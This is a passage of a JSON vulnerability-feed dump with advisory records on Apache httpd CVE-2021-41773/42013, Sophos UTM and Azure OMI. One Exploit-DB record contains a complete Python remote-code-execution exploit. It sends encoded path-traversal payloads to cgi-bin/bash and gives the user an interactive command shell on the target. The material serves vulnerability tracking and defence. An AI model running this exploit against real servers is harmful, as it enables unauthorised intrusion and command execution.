6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-19T23:45:37", "id": "H1:1404731", "href": "https://hackerone.com/reports/1404731", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "photon": [{"lastseen": "2022-05-12T18:54:18", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-0118", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-19T00:00:00", "id": "PHSA-2021-0118", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-118", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-10T03:16:20", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-20T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-4.0-0118", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-20T00:00:00", "id": "PHSA-2021-4.0-0118", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-118", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-10-13T10:35:39", "description": "The Apache HTTP Server 2.4.49 is vulnerable to a flaw that allows attackers to use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. This issue is known to be exploited in the wild.\n\n### The vulnerability\n\nThe Apache HTTP Server Project started out as an effort to develop and maintain an open-source HTTP server for modern operating systems, including UNIX and Windows. It provides a secure, efficient, and extensible server that provides HTTP services in sync with the current HTTP standards.\n\nThe flaw (listed as [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>)) was introduced by a change made to path normalization in Apache HTTP Server 2.4.49. So, earlier versions are not vulnerable, nor are servers that are configured to "require all denied". \n\nUnfortunately, \u201crequire all denied\u201d is off in the default configuration. This is the setting that typically shows an error that looks like this:\n\n_ "Forbidden. You don't have permission to access {path}."_\n\n### Path traversal attack\n\nPath traversal attacks are done by sending requests to access backend or sensitive server directories that should be out of reach for unauthorized users. While normally these requests are blocked, the vulnerability allows an attacker to bypass the filters by using encoded characters (ASCII) for the URLs.\n\nUsing this method an attacker could gain access to files like cgi scripts that are active on the server, which could potentially reveal configuration details that could be used in further attacks.\n\n### Impact\n\nThe Apache HTTP Server Project was launched in 1995, and it's been the most popular web server on the Internet since April 1996. In August 2021 there were some 49 million active sites running on Apache server. Obviously we do not know which server every domain is using, but of the sites where we can identify the web server, Apache is used by 30.9%.\n\nA [Shodan search by Bleeping Computer](<https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/apache_number.jpg> \"\" ) showed that there are over a hundred thousand Apache HTTP Server 2.4.49 deployments online, many of which could be vulnerable to exploitation.\n\nSecurity researchers have warned that admins should patch immediately.\n\n> If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability <https://t.co/2QiV4h77B4>\n> \n> -- Mark J Cox (@iamamoose) [October 5, 2021](<https://twitter.com/iamamoose/status/1445304838963830784?ref_src=twsrc%5Etfw>)\n\n### Another vulnerability\n\nThere's a second vulnerability tackled by this patch\u2014[CVE-2021-41524](<https://nvd.nist.gov/vuln/detail/CVE-2021-41524>)\u2014a null pointer dereference detected during HTTP/2 request processing. This flaw allows an attacker to perform a denial of service (DoS) attack on the server. This requires a specially crafted request.\n\nThis flaw also only exists in Apache Server version 2.4.49, but is different to the first vulnerability in that, as far as we know, it is not under active exploitation. It was discovered three weeks ago, fixed late last month, and incorporated now in version 2.4.50.\n\n### Mitigation\n\nAll users should install the latest version as soon as possible, but:\n\n * Users that have not installed 2.4.49 yet should skip this version in their update cycle and go straight to 2.4.50.\n * Users that have 2.4.49 installed should configure \u201crequire all denied\u201d if they do not plan to patch quickly, since this blocks the attack that has been seen in the wild.\n\nA full list of vulnerabilities in Apache HTTP Server 2.4 can be found [here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Update, October 8 \n\nApache has issued a new patch. According to the release notes for version 2.4.51\u2026\n\n> \u2026the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThe new part of the vulnerability is listed under [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>). The "require all denied" setting blocks attacks using this vulnerability as well. Time to patch the patch.\n\nStay safe, everyone!\n\nThe post [[Updated, again] Apache fixes zero-day vulnerability in HTTP Server](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-10-06T14:23:08", "type": "malwarebytes", "title": "[Updated, again] Apache fixes zero-day vulnerability in HTTP Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T14:23:08", "id": "MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cisco": [{"lastseen": "2022-12-17T06:19:59", "description": "On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities:\n CVE-2021-41524: Null Pointer Dereference Vulnerability CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n\nFor descriptions of these vulnerabilities, see the Apache Security Announcement [\"https://httpd.apache.org/security/vulnerabilities_24.html\"]. For additional information, see the Cisco TALOS blog post, Threat Advisory: Apache HTTP Server zero-day vulnerability opens door for attackers [\"https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html\"].\n\nCisco investigated its product line and concluded that no Cisco products are affected by these vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:00:00", "type": "cisco", "title": "Apache HTTP Server Vulnerabilities: October 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T16:00:00", "id": "CISCO-SA-APACHE-HTTPD-PATHTRV-LAZG68CZ", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-pathtrv-LAzg68cZ", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:03:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "exploitdb", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-41773", "2021-42013", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "EDB-ID:50512", "href": "https://www.exploit-db.com/exploits/50512", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\r\n# Date: 11/11/2021\r\n# Exploit Author: Valentin Lobstein\r\n# Vendor Homepage: https://apache.org/\r\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\r\n# Tested on: Debian GNU/Linux\r\n# CVE : CVE-2021-41773 / CVE-2021-42013\r\n# Credits : Lucas Schnell\r\n\r\n\r\n#!/usr/bin/env python3\r\n#coding: utf-8\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nimport requests\r\nfrom colorama import Fore,Style\r\n\r\n\r\nheader = '''\\033[1;91m\r\n \r\n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \r\n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \r\n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \r\n \u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \r\n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\r\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\r\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\r\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \r\n''' + Style.RESET_ALL\r\n\r\n\r\nif len(sys.argv) < 2 :\r\n print( 'Use: python3 file.py ip:port ' )\r\n sys.exit()\r\n\r\ndef end():\r\n print(\"\\t\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\ndef commands(url,command,session):\r\n directory = mute_command(url,'pwd')\r\n user = mute_command(url,'whoami')\r\n hostname = mute_command(url,'hostname')\r\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\r\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \r\n command = f\"echo; {command};\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n print(output)\r\n if 'clear' in command:\r\n os.system('/usr/bin/clear')\r\n print(header)\r\n if 'exit' in command:\r\n end()\r\n\r\ndef mute_command(url,command):\r\n session = requests.Session()\r\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n return response.text.strip()\r\n\r\n\r\ndef exploitRCE(payload):\r\n s = requests.Session()\r\n try:\r\n host = sys.argv[1]\r\n if 'http' not in host:\r\n url = 'http://'+ host + payload\r\n else:\r\n url = host + payload \r\n session = requests.Session()\r\n command = \"echo; id\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n if \"uid\" in output:\r\n choice = \"Y\"\r\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\r\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\r\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \")\r\n if choice.lower() in ['','y','yes']:\r\n while True:\r\n commands(url,command,session) \r\n else:\r\n end() \r\n else :\r\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\r\n except KeyboardInterrupt:\r\n end()\r\n\r\ndef main():\r\n try:\r\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\r\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\r\n payloads = [apache2449_payload,apache2450_payload]\r\n choice = len(payloads) + 1\r\n print(header)\r\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\r\n while choice >= len(payloads) and choice >= 0:\r\n choice = int(input('[~] Choice : '))\r\n if choice < len(payloads):\r\n exploitRCE(payloads[choice])\r\n except KeyboardInterrupt:\r\n print(\"\\n\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50512", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2022-01-26T11:31:53", "description": "Added: 08/27/2021 \n\n\n### Background\n\n[Sophos UTM](<https://www.sophos.com/en-us/products/unified-threat-management.aspx>) is a network security appliance. \n\n### Problem\n\nA vulnerability in the Webadmin interface allows remote attackers to execute arbitrary commands by sending a specially crafted POST request. \n\n### Resolution\n\nUpgrade to Sophos SG UTM v9.511 MR11, v9.607 MR7, or v9.705 MR5 or higher. \n\n### References\n\n<https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223> \n<https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223> \n\n\n### Limitations\n\nExploit works on Sophos UTM v9.701 and possibly other versions. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-27T00:00:00", "type": "saint", "title": "Sophos UTM Webadmin remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2021-08-27T00:00:00", "id": "SAINT:3AB9E5583CEF507F3F7486F6FF1A59BA", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/sophos_utm_webadmin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Added: 08/27/2021 \n\n\n### Background\n\n[Sophos UTM](<https://www.sophos.com/en-us/products/unified-threat-management.aspx>) is a network security appliance. \n\n### Problem\n\nA vulnerability in the Webadmin interface allows remote attackers to execute arbitrary commands by sending a specially crafted POST request. \n\n### Resolution\n\nUpgrade to Sophos SG UTM v9.511 MR11, v9.607 MR7, or v9.705 MR5 or higher. \n\n### References\n\n<https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223> \n<https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223> \n\n\n### Limitations\n\nExploit works on Sophos UTM v9.701 and possibly other versions. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-27T00:00:00", "type": "saint", "title": "Sophos UTM Webadmin remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2021-08-27T00:00:00", "id": "SAINT:4A73A5CD7FE341977E86117842CBB67D", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/sophos_utm_webadmin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:32:06", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:E5FBEA63E5EE8A91F5066541141037D1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:36:50", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-08T18:37:00", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-26T16:34:08", "description": "squid is vulnerable to denial of service (DoS). The vulnerability exists through an incorrect memory management bug that affects all clients using the proxy.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, 